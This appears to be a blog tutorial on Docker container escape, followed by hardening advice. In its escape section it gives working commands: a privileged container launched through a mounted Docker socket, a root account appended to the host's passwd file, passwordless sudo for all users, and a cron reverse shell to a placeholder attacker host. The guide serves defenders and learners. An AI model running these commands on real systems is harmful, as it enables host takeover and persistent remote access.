Container-Escaping¶

docker-chacho

Background¶

Escaping a container is when a user or process breaks out from the confines of a Docker (or other type of) container to access the host machine or other containers. It's a critical concern in container security, as it could lead to unauthorized access to the host system, data leakage, or further exploitation of the network. And that would be bad. So how does it happen?

Process¶

1. Assumed Initial Access and Reconnaissance¶

Initial Access: This blog is just exploring the container-escaping aspect of an attack. It is assumed that access to a container at which point the attacker would gather info.
Reconnaissance: Gather information about the container environment, such as the Docker version, running services, network configuration, and mounted volumes.
```
docker --version
```
```
ps aux
```

2. Exploiting Misconfigurations or Vulnerabilities¶

Misconfigured Docker Sockets: If the Docker daemon socket (/var/run/docker.sock) is mounted inside the container, an attacker can interact with the Docker daemon directly, potentially controlling all Docker containers and the host.
Insecure Capabilities: Docker containers run with a default set of capabilities that grant them certain permissions. If unnecessary capabilities are enabled, an attacker might exploit them to escalate privileges.
Vulnerable Software: Containers might run outdated or vulnerable software that can be exploited to gain increased privileges or execute arbitrary code.

Daemon Access?

ls -l /var/run/docker.sock

or

mount | grep "/var/run/docker.sock"

(If this retunrs something, jump to here.)

Finding Permissions

Checking GUID/SUID files:

find / -perm -4000 -type f 2>/dev/null`

find / -perm -2000 -type f 2>/dev/null

Checking for writeable directories:

find / -type d -writable 2>/dev/null

Find writable directories in the PATH:

echo $PATH | tr ':' '\n' | while read p; do find "$p" -writable -type d 2>/dev/null; done

Enumerate the Environment

ps aux

Check installed packages¶

Debian/Ubuntu Containers:

dpkg -l

CentOS/RHEL Containers:

rpm -qa

Alpine Containers:

apk -l

Identify Network Services¶

netstat -tuln

Search for Vulns

searchsploit <softwareName> <version>

sudo nmap -sV --script=vuln <target IP>

Exploit-DB
National Vulnerability Database
CVE Details
Directly from vendors whose software you've identified through enumeration.

3. Privilege Escalation¶

Kernel Vulnerabilities: Since containers share the host’s kernel, any kernel vulnerabilities can potentially be exploited to escape the container. This often involves executing a privilege escalation exploit.
Misconfigured Containers: Certain configurations, such as running containers as root without user namespace remapping, can facilitate container escape if an attacker manages to exploit other vulnerabilities.

4. Breaking Out of the Container¶

Exploiting the Host from Within: Using the gathered information and exploited vulnerabilities, the attacker attempts to execute commands or deploy malware on the host system. This might involve writing to the host’s filesystem if accessible or using the Docker API to start new containers with escalated privileges.
Network Attacks: If the container network is not properly isolated, attackers might move laterally to attack other containers or the host network.

Docker Daemon Access

If the Docker daemon's socket is mounted inside the container (/var/run/docker.sock), you can interact directly with the Docker host. For example, you can list all Docker containers on the host:

docker -H unix:///var/run/docker.sock ps

And you could create a malicious container with privileged access to the host's system and network:

docker -H unix:///var/run/docker.sock run -it --net=host --privileged ubuntu /bin/bash

Host Directory Mount Point

If the creator of the container mapped it to a critical directory (like this one), this would create an opportunity to modify system configuration files or place malicious files directly into the host's filesystem.

Add a User to the Host System¶

echo 'malicioususer:x:0:0:root:/root:/bin/bash' >> /container/etc/passwd

Modify sudoers File¶

echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /container/etc/sudoers

Inject Malicious Scripts Into Config Files¶

echo '/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1' >> /container/etc/cron.daily/maliciousjob

Network Attacks

Once in one container, the attacker can use scanning tools (e.g. nmap) or custom scripts to scan the internal Docker network. Scanning teh default Docker bridge network range other containers:

nmap -sn 172.17.0.0/16

If any container is running in host network mode (i.e., it shares the network namespace with the host), an attacker who compromises this container could directly access the host's network interfaces and services. Alternatively, if the attacker finds misconfigurations (e.g., exposed Docker daemon ports, sensitive information in environment variables), they might leverage these to escalate privileges or attack the host system directly.

Preventative Measures¶

Secure Configuration: Follow best practices for Docker security, such as running containers with the least privilege, avoiding mounting the Docker socket inside containers, and enabling user namespace remapping.

Only mount necessary directories into Docker containers and use read-only mounts when possible. Carefully review and limit the directories that are shared between the host and containers.

From the host machine, check that the Docker socket is not mounted in any containers:¶
```
docker ps --format '{{.Names}}' | xargs -I {} docker inspect {} -f '{{ .Mounts }}' | grep docker.sock
```
User Namespace Remapping¶

User namespaces are a feature of the Linux kernel that allows for the separation of user ID (UID) and group ID (GID) number spaces. When applied to Docker containers, user namespace remapping provides a layer of security by mapping the root user inside a container to a non-root user on the Docker host. With this, if an attacker compromises the container as the root user, their capabilities are limited when it comes to affecting the host system directly, because their actions are mapped to a less privileged user on the host.
Regular Updates: Keep the Docker engine, containers, and host system updated to protect against known vulnerabilities.
```
docker --version
```
Update Docker Engine (Linux)¶
```
sudo apt update
sudo apt install docker-ce docker-ce-cli containerd.io
```
"Update" Docker Containers¶

You can't really update containers, but you can pull the latest image from the Docker registry and recreate your container when there are updates. Check for updates on teh image for which your container is based:
```
docker pull <image_name>:<tag>
```
Recreate containers when there is an updated image version:
```
docker stop <container_name>
docker rm <container_name>
docker run <options> <image_name>:<tag>
```
Network Segmentation and Monitoring: Properly isolate container networks and monitor network traffic for suspicious activities.
Security Scanning and Auditing: Regularly scan containers and images for vulnerabilities, and audit Docker configurations and host systems for misconfigurations or signs of compromise.